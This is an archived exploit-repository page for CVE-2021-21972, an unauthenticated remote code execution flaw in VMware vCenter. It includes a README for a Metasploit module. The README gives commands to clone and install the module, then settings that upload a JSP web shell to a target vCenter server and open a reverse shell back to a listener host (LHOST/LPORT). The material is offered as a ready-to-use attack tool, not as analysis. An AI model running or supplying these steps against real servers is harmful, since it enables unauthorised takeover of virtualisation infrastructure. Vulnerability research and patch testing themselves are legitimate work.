Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-21972 PoC — VMware vSphere Client 路径遍历漏洞

Source
Associated Vulnerability
Title:VMware vSphere Client 路径遍历漏洞 (CVE-2021-21972)
Description:VMware vSphere Client是美国威睿(VMware)公司的一个应用软件。提供虚拟化管理。 VMware vSphere Client存在路径遍历漏洞,未授权的攻击者可以通过开放443端口的服务器向vCenter Server发送精心构造的请求,从而在目标系统上远程执行恶意代码。以下产品和版本受到影响:vSphere Client 6.5、vSphere Client 6.7、vSphere Client 7.0、VMware Cloud Foundation(vCenter Server)
Description
CVE-2021-21972 Unauthorized RCE in VMware vCenter metasploit exploit script
Readme
# CVE-2021-21972
CVE-2021-21972 Unauthorized RCE in VMware vCenter metasploit exploit script

# preparation
```zsh
git clone https://github.com/TaroballzChen/CVE-2021-21972
cd CVE-2021-21972
mkdir -p ~/.msf4/modules/exploits/multi/http
cp * ~/.msf4/modules/exploits/multi/http
chmod +x ~/.msf4/modules/exploits/multi/http/vmware_vcenter_server_unauthenticated_file_upload_exploit.py
msfconsole
```

# metasploit usage
```console
set target <target>
set PAYLOAD <payload>
set rfile ~/.msf4/modules/exploits/multi/http/shell1.jsp
set rhost <vuln ip>
set rssl <true for https ; false for http>
set port <vuln port>
set LHOST <list host ip>
set LPORT <list port>
```

# exploit
![setting](1.png)
![exploit](2.png)
File Snapshot

[4.0K] /data/pocs/45f8efd101b96e7eeef2f8234bbf15917caf4548 ├── [550K] 1.png ├── [310K] 2.png ├── [ 34K] LICENSE ├── [ 709] README.md ├── [ 763] shell1.jsp └── [ 11K] vmware_vcenter_server_unauthenticated_file_upload_exploit.py 0 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.